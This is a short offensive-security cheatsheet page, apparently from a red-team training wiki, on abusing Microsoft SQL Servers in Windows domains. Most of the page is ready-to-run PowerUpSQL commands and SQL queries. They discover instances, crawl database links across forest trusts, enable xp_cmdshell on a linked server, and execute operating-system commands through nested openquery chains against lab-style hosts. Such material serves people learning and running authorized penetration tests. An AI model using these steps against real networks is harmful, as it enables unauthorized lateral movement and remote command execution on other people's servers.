MSSQL Servers

General

Generally deployed in a lot of Windows domains
Good option for lateral movement as domain users can be mapped to database roles
We can use PowerUpSQL for exploitation
Cheatsheet

Exploitation

Enumeration

# Discovery (SPN Scanning)
Get-SQLInstanceDomain

# Check accessibility
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

# Gather information
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Database Links

Database link allows a SQL Server to access exteranl data sources like other SQL server and OLE DB data sources
For links between SQL servers, we can exectue stored procedures
Links work across forest trusts

Using PowerUpSQL

# Look for links to remote server
Get-SQLServerLink -Instance dcorp-mssql -Verbose

# Enumerate database links
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose

# Execute commands
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'"

Using SQL Queries

/* Enumerate database links */
select * from master..sysservers

/* Run queries on a linked database through OpenQuery() */
select * from openquery("dcorp-sql1", "select * from master..sysservers")

/* Chain queries to access nested links */
select * from openquery("dcorp-sql", 'select * from openquery("dcorp-mgmt", "select * from master..sysservers")')

/* Enable xp_cmdshell */
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "eu-sql"

/* Execute commands using nested link queries */
select * from openquery("dcorp-sql1", 'select * from openquery("dcorp-mgmt", "select * from openquery("eu-sql.eu.eurocorp.local", ""select @@version as version; exec master..xp_cmdshell "powershell whoami)"")")')

PreviousCross Forest Attacks NextMITM & Relay Attacks

Last updated 2 years ago